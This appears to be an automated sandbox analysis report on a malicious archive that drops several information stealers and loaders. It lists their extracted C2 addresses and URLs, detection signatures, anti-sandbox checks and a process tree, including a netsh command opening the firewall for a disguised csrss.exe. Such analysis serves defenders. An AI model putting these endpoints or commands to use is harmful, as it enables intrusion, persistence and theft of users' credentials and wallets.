Analysis
-
max time kernel
229s -
max time network
1272s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
08/03/2024, 17:52
Static task
static1
Behavioral task
behavioral1
Sample
release.zip
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
release.zip
Resource
win10v2004-20240226-en
Errors
General
-
Target
release.zip
-
Size
7.9MB
-
MD5
3d6d694ba79cb3f7ba918ea1c7df752b
-
SHA1
f4302d015f72b777c717d363afaf474cc745fbdd
-
SHA256
5719f946c9c01d25c4b870bef5c16549a38043e02aba33a2859cd4490f9ac998
-
SHA512
5bb54c7ae44f3a816fa700fffef7a7e2cd74e4d71d99588e10a765e2d98e49c74bb5b29d44c8ee4749a3405b0010ec2118d8101d5738fecac55b660cc5cf35fc
-
SSDEEP
196608:14ULFz/UR8Qfau86YNqlGvGhTDa/M0OwKucQ/2:1HOdfT85/XKU/2
Malware Config
Extracted
risepro
95.217.142.46:50500
193.233.132.62
Extracted
raccoon
4ddee039c3c1cb01baf0736505e3e436
http://94.131.106.24:80
-
user_agent
MrBidenNeverKnow
Extracted
vidar
8.1
2de48e5cebb13eab4ddb53ad011d40d1
https://steamcommunity.com/profiles/76561199649267298
https://t.me/uprizin
-
profile_id_v2
2de48e5cebb13eab4ddb53ad011d40d1
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 OPR/96.0.0.0
Extracted
smokeloader
2022
http://kamsmad.com/tmp/index.php
http://souzhensil.ru/tmp/index.php
http://teplokub.com.ua/tmp/index.php
Extracted
smokeloader
pub3
Extracted
raccoon
-
user_agent
f
Signatures
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral2/memory/1856-651-0x0000000000400000-0x00000000021CF000-memory.dmp family_vidar_v7 behavioral2/memory/1856-710-0x0000000000400000-0x00000000021CF000-memory.dmp family_vidar_v7 behavioral2/memory/1856-644-0x0000000004150000-0x0000000004681000-memory.dmp family_vidar_v7 -
Detect ZGRat V1 12 IoCs
resource yara_rule behavioral2/files/0x000700000002329e-164.dat family_zgrat_v1 behavioral2/files/0x000700000002329c-510.dat family_zgrat_v1 behavioral2/files/0x000700000002329e-518.dat family_zgrat_v1 behavioral2/memory/2212-549-0x0000000000490000-0x00000000007B8000-memory.dmp family_zgrat_v1 behavioral2/memory/4792-577-0x0000000000970000-0x00000000009E8000-memory.dmp family_zgrat_v1 behavioral2/memory/1816-575-0x0000000000430000-0x00000000006CC000-memory.dmp family_zgrat_v1 behavioral2/memory/2392-602-0x0000000000400000-0x000000000044C000-memory.dmp family_zgrat_v1 behavioral2/files/0x0007000000023294-566.dat family_zgrat_v1 behavioral2/memory/1544-512-0x00000000002F0000-0x00000000009DA000-memory.dmp family_zgrat_v1 behavioral2/files/0x00070000000232a1-494.dat family_zgrat_v1 behavioral2/files/0x000700000002329e-277.dat family_zgrat_v1 behavioral2/files/0x000700000002329c-232.dat family_zgrat_v1 -
Glupteba payload 6 IoCs
resource yara_rule behavioral2/memory/848-633-0x00000000043F0000-0x0000000004CDB000-memory.dmp family_glupteba behavioral2/memory/848-650-0x0000000000400000-0x00000000022F3000-memory.dmp family_glupteba behavioral2/memory/4480-659-0x0000000004470000-0x0000000004D5B000-memory.dmp family_glupteba behavioral2/memory/4480-661-0x0000000000400000-0x00000000022F3000-memory.dmp family_glupteba behavioral2/memory/4480-706-0x0000000000400000-0x00000000022F3000-memory.dmp family_glupteba behavioral2/memory/848-709-0x0000000000400000-0x00000000022F3000-memory.dmp family_glupteba -
Raccoon Stealer V2 payload 3 IoCs
resource yara_rule behavioral2/files/0x00070000000232c3-613.dat family_raccoon_v2 behavioral2/memory/716-643-0x0000000000400000-0x0000000001A3C000-memory.dmp family_raccoon_v2 behavioral2/memory/716-641-0x0000000001BC0000-0x0000000001C0E000-memory.dmp family_raccoon_v2 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/2392-602-0x0000000000400000-0x000000000044C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ crtjW9FdAFh1RpA0LLVUF2bK.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4352 netsh.exe 5272 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion crtjW9FdAFh1RpA0LLVUF2bK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion crtjW9FdAFh1RpA0LLVUF2bK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 24 IoCs
pid Process 3012 setup.exe 4480 XT2yUCFm3I_A8VHeNywSw5ta.exe 2212 JExlHeW7un3bke1OHHXh10ie.exe 4472 crtjW9FdAFh1RpA0LLVUF2bK.exe 688 I9ymkTTokwU3_itoLBYFoASS.exe 3868 y1JwebHBmbC_K8bpIfqY7dAT.exe 1856 XGRjqH3jMgozHbf6PoVnfQTH.exe 848 brfAj59VD3dbF2T6UbdmVF89.exe 3432 AfqN23MB7ZIBJA6OIzESsczD.exe 3488 O8XFuPPqGVPZVYUYSnSNUfon.exe 3004 oI1ZPB2vxSetVpZWfFiI6Wgi.exe 4600 oMPmIJRvLAHQ1Yl4K6ywiUDD.exe 5080 1d1mNOghqDYI4YsW8IbJNqwz.exe 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 1544 otr_2ge4eomGQQmUEl_yFDKI.exe 1816 ASo1Xru8VS6Xfyo5j8fzoFUR.exe 4792 _kwqjZC3zYczCTpbpeL0J3HT.exe 2600 k80_0TvoDvIvtBz67zMxLD0b.exe 4744 magicmailmonitor.exe 452 Install.exe 4316 magicmailmonitor.exe 4400 Install.exe 716 wfplwfs.exe 4648 2.3.1.1.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Wine crtjW9FdAFh1RpA0LLVUF2bK.exe -
Loads dropped DLL 1 IoCs
pid Process 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 243 iplogger.org 113 bitbucket.org 122 bitbucket.org 123 bitbucket.org 141 bitbucket.org 142 bitbucket.org 170 bitbucket.org 242 iplogger.org -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 99 api.myip.com 102 api.myip.com 103 ipinfo.io 104 ipinfo.io -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI setup.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy setup.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini setup.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol setup.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4792 set thread context of 2392 4792 _kwqjZC3zYczCTpbpeL0J3HT.exe 167 PID 1816 set thread context of 1036 1816 ASo1Xru8VS6Xfyo5j8fzoFUR.exe 175 PID 2212 set thread context of 6036 2212 JExlHeW7un3bke1OHHXh10ie.exe 506 -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4640 sc.exe 5552 sc.exe 5320 sc.exe 5876 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 3048 6036 WerFault.exe 257 5400 688 WerFault.exe 3232 1036 WerFault.exe 4448 3004 WerFault.exe 265 1196 1856 WerFault.exe 1936 1544 WerFault.exe 147 1892 2836 WerFault.exe 317 5160 5736 WerFault.exe 321 3640 5688 WerFault.exe 343 2520 5848 WerFault.exe 361 3228 5080 WerFault.exe 144 2888 5136 WerFault.exe 438 3336 5800 WerFault.exe 441 2548 3768 WerFault.exe 497 6052 1644 WerFault.exe 500 2244 5904 WerFault.exe 503 1936 6036 WerFault.exe 506 2520 5492 WerFault.exe 510 1496 5848 WerFault.exe 513 5936 6100 WerFault.exe 516 5676 5452 WerFault.exe 519 652 5928 WerFault.exe 523 5824 5580 WerFault.exe 528 1880 5888 WerFault.exe 531 5560 5480 WerFault.exe 534 6032 2992 WerFault.exe 537 3844 5848 WerFault.exe 540 4580 5732 WerFault.exe 544 6124 3584 WerFault.exe 547 2916 3436 WerFault.exe 550 1052 3696 WerFault.exe 553 5388 1328 WerFault.exe 556 6028 4460 WerFault.exe 559 2884 4896 WerFault.exe 563 2184 4500 WerFault.exe 566 3756 5480 WerFault.exe 571 860 1960 WerFault.exe 575 1140 4076 WerFault.exe 580 1128 4404 WerFault.exe 583 1696 5508 WerFault.exe 586 5164 4012 WerFault.exe 589 4024 2912 WerFault.exe 593 5740 5984 WerFault.exe 596 3632 1884 WerFault.exe 599 2472 5316 WerFault.exe 602 3904 4800 WerFault.exe 606 4076 1112 WerFault.exe 609 4404 1924 WerFault.exe 612 1588 2872 WerFault.exe 615 3232 3544 WerFault.exe 618 3236 3352 WerFault.exe 621 2912 3716 WerFault.exe 624 4776 4500 WerFault.exe 627 1680 1892 WerFault.exe 630 4532 5040 WerFault.exe 633 3012 544 WerFault.exe 636 8 2220 WerFault.exe 640 996 852 WerFault.exe 644 1272 388 WerFault.exe 647 5292 4640 WerFault.exe 650 2672 3232 WerFault.exe 653 3444 3236 WerFault.exe 656 5620 2236 WerFault.exe 666 5932 692 WerFault.exe 669 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI oMPmIJRvLAHQ1Yl4K6ywiUDD.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI oMPmIJRvLAHQ1Yl4K6ywiUDD.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI oMPmIJRvLAHQ1Yl4K6ywiUDD.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1d1mNOghqDYI4YsW8IbJNqwz.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1d1mNOghqDYI4YsW8IbJNqwz.exe -
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5708 schtasks.exe 880 schtasks.exe 5852 schtasks.exe 1576 schtasks.exe 4788 schtasks.exe 1708 schtasks.exe 3956 schtasks.exe 4056 schtasks.exe 5332 schtasks.exe 5572 schtasks.exe 5532 schtasks.exe 4476 schtasks.exe 5472 schtasks.exe 4124 schtasks.exe 5960 schtasks.exe 2976 schtasks.exe 3096 schtasks.exe 2884 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3488 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ setup.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5304 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3012 setup.exe 3012 setup.exe 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 3488 O8XFuPPqGVPZVYUYSnSNUfon.exe 3488 O8XFuPPqGVPZVYUYSnSNUfon.exe 4600 oMPmIJRvLAHQ1Yl4K6ywiUDD.exe 4600 oMPmIJRvLAHQ1Yl4K6ywiUDD.exe 4280 powershell.exe 4280 powershell.exe 4280 powershell.exe 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 2392 RegAsm.exe 2392 RegAsm.exe 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 5080 1d1mNOghqDYI4YsW8IbJNqwz.exe 5080 1d1mNOghqDYI4YsW8IbJNqwz.exe 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 3460 Process not Found 4448 powershell.exe 4448 powershell.exe 5420 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4600 oMPmIJRvLAHQ1Yl4K6ywiUDD.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeRestorePrivilege 4536 7zG.exe Token: 35 4536 7zG.exe Token: SeSecurityPrivilege 4536 7zG.exe Token: SeSecurityPrivilege 4536 7zG.exe Token: SeRestorePrivilege 5060 7zG.exe Token: 35 5060 7zG.exe Token: SeSecurityPrivilege 5060 7zG.exe Token: SeSecurityPrivilege 5060 7zG.exe Token: SeDebugPrivilege 2392 RegAsm.exe Token: SeDebugPrivilege 4280 powershell.exe Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 5420 powershell.exe Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 3460 Process not Found Token: SeCreatePagefilePrivilege 3460 Process not Found Token: SeShutdownPrivilege 5864 powercfg.exe Token: SeCreatePagefilePrivilege 5864 powercfg.exe Token: SeShutdownPrivilege 5836 powercfg.exe Token: SeCreatePagefilePrivilege 5836 powercfg.exe Token: SeShutdownPrivilege 5852 powercfg.exe Token: SeCreatePagefilePrivilege 5852 powercfg.exe Token: SeShutdownPrivilege 5844 powercfg.exe Token: SeCreatePagefilePrivilege 5844 powercfg.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4536 7zG.exe 5060 7zG.exe 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp -
Suspicious use of SetWindowsHookEx 22 IoCs
pid Process 3012 setup.exe 4480 XT2yUCFm3I_A8VHeNywSw5ta.exe 688 I9ymkTTokwU3_itoLBYFoASS.exe 3868 y1JwebHBmbC_K8bpIfqY7dAT.exe 3432 AfqN23MB7ZIBJA6OIzESsczD.exe 4472 crtjW9FdAFh1RpA0LLVUF2bK.exe 848 brfAj59VD3dbF2T6UbdmVF89.exe 4600 oMPmIJRvLAHQ1Yl4K6ywiUDD.exe 3004 oI1ZPB2vxSetVpZWfFiI6Wgi.exe 5080 1d1mNOghqDYI4YsW8IbJNqwz.exe 1856 XGRjqH3jMgozHbf6PoVnfQTH.exe 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 2600 k80_0TvoDvIvtBz67zMxLD0b.exe 4744 magicmailmonitor.exe 452 Install.exe 4316 magicmailmonitor.exe 4400 Install.exe 716 wfplwfs.exe 2392 RegAsm.exe 1036 RegAsm.exe 4648 2.3.1.1.exe 6036 RegAsm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3012 wrote to memory of 4480 3012 setup.exe 133 PID 3012 wrote to memory of 4480 3012 setup.exe 133 PID 3012 wrote to memory of 4480 3012 setup.exe 133 PID 3012 wrote to memory of 2212 3012 setup.exe 134 PID 3012 wrote to memory of 2212 3012 setup.exe 134 PID 3012 wrote to memory of 2212 3012 setup.exe 134 PID 3012 wrote to memory of 4472 3012 setup.exe 135 PID 3012 wrote to memory of 4472 3012 setup.exe 135 PID 3012 wrote to memory of 4472 3012 setup.exe 135 PID 3012 wrote to memory of 1856 3012 setup.exe 409 PID 3012 wrote to memory of 1856 3012 setup.exe 409 PID 3012 wrote to memory of 1856 3012 setup.exe 409 PID 3012 wrote to memory of 848 3012 setup.exe 136 PID 3012 wrote to memory of 848 3012 setup.exe 136 PID 3012 wrote to memory of 848 3012 setup.exe 136 PID 3012 wrote to memory of 688 3012 setup.exe 318 PID 3012 wrote to memory of 688 3012 setup.exe 318 PID 3012 wrote to memory of 688 3012 setup.exe 318 PID 3012 wrote to memory of 3868 3012 setup.exe 139 PID 3012 wrote to memory of 3868 3012 setup.exe 139 PID 3012 wrote to memory of 3868 3012 setup.exe 139 PID 3012 wrote to memory of 3432 3012 setup.exe 141 PID 3012 wrote to memory of 3432 3012 setup.exe 141 PID 3012 wrote to memory of 3432 3012 setup.exe 141 PID 3012 wrote to memory of 4600 3012 setup.exe 142 PID 3012 wrote to memory of 4600 3012 setup.exe 142 PID 3012 wrote to memory of 4600 3012 setup.exe 142 PID 3012 wrote to memory of 5080 3012 setup.exe 144 PID 3012 wrote to memory of 5080 3012 setup.exe 144 PID 3012 wrote to memory of 5080 3012 setup.exe 144 PID 3012 wrote to memory of 3488 3012 setup.exe 376 PID 3012 wrote to memory of 3488 3012 setup.exe 376 PID 3012 wrote to memory of 3004 3012 setup.exe 145 PID 3012 wrote to memory of 3004 3012 setup.exe 145 PID 3012 wrote to memory of 3004 3012 setup.exe 145 PID 3868 wrote to memory of 3976 3868 y1JwebHBmbC_K8bpIfqY7dAT.exe 146 PID 3868 wrote to memory of 3976 3868 y1JwebHBmbC_K8bpIfqY7dAT.exe 146 PID 3868 wrote to memory of 3976 3868 y1JwebHBmbC_K8bpIfqY7dAT.exe 146 PID 3012 wrote to memory of 1816 3012 setup.exe 381 PID 3012 wrote to memory of 1816 3012 setup.exe 381 PID 3012 wrote to memory of 1816 3012 setup.exe 381 PID 3012 wrote to memory of 1544 3012 setup.exe 358 PID 3012 wrote to memory of 1544 3012 setup.exe 358 PID 3012 wrote to memory of 1544 3012 setup.exe 358 PID 3012 wrote to memory of 2600 3012 setup.exe 149 PID 3012 wrote to memory of 2600 3012 setup.exe 149 PID 3012 wrote to memory of 2600 3012 setup.exe 149 PID 3012 wrote to memory of 4792 3012 setup.exe 391 PID 3012 wrote to memory of 4792 3012 setup.exe 391 PID 3012 wrote to memory of 4792 3012 setup.exe 391 PID 3976 wrote to memory of 4744 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 357 PID 3976 wrote to memory of 4744 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 357 PID 3976 wrote to memory of 4744 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 357 PID 3432 wrote to memory of 452 3432 AfqN23MB7ZIBJA6OIzESsczD.exe 153 PID 3432 wrote to memory of 452 3432 AfqN23MB7ZIBJA6OIzESsczD.exe 153 PID 3432 wrote to memory of 452 3432 AfqN23MB7ZIBJA6OIzESsczD.exe 153 PID 3976 wrote to memory of 4316 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 155 PID 3976 wrote to memory of 4316 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 155 PID 3976 wrote to memory of 4316 3976 y1JwebHBmbC_K8bpIfqY7dAT.tmp 155 PID 2212 wrote to memory of 1092 2212 JExlHeW7un3bke1OHHXh10ie.exe 157 PID 2212 wrote to memory of 1092 2212 JExlHeW7un3bke1OHHXh10ie.exe 157 PID 2212 wrote to memory of 1092 2212 JExlHeW7un3bke1OHHXh10ie.exe 157 PID 452 wrote to memory of 4400 452 Install.exe 156 PID 452 wrote to memory of 4400 452 Install.exe 156
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\release.zip1⤵PID:2752
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3880
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap10246:72:7zEvent326791⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4536
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap22687:72:7zEvent13611⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5060
-
C:\Users\Admin\Desktop\setup.exe"C:\Users\Admin\Desktop\setup.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\Documents\GuardFox\XT2yUCFm3I_A8VHeNywSw5ta.exe"C:\Users\Admin\Documents\GuardFox\XT2yUCFm3I_A8VHeNywSw5ta.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
C:\Users\Admin\Documents\GuardFox\XT2yUCFm3I_A8VHeNywSw5ta.exe"C:\Users\Admin\Documents\GuardFox\XT2yUCFm3I_A8VHeNywSw5ta.exe"3⤵PID:4712
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2992
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:4688
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:5272
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:5928
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2908
-
-
-
-
C:\Users\Admin\Documents\GuardFox\JExlHeW7un3bke1OHHXh10ie.exe"C:\Users\Admin\Documents\GuardFox\JExlHeW7un3bke1OHHXh10ie.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1092
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3680
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4488
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5056
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:992
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3420
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1112
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2096
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4944
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2872
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2248
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4744
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3528
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1936
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4768
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4428
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4396
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4976
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4124
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4568
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:880
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1468
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4892
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5124
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5140
-
-
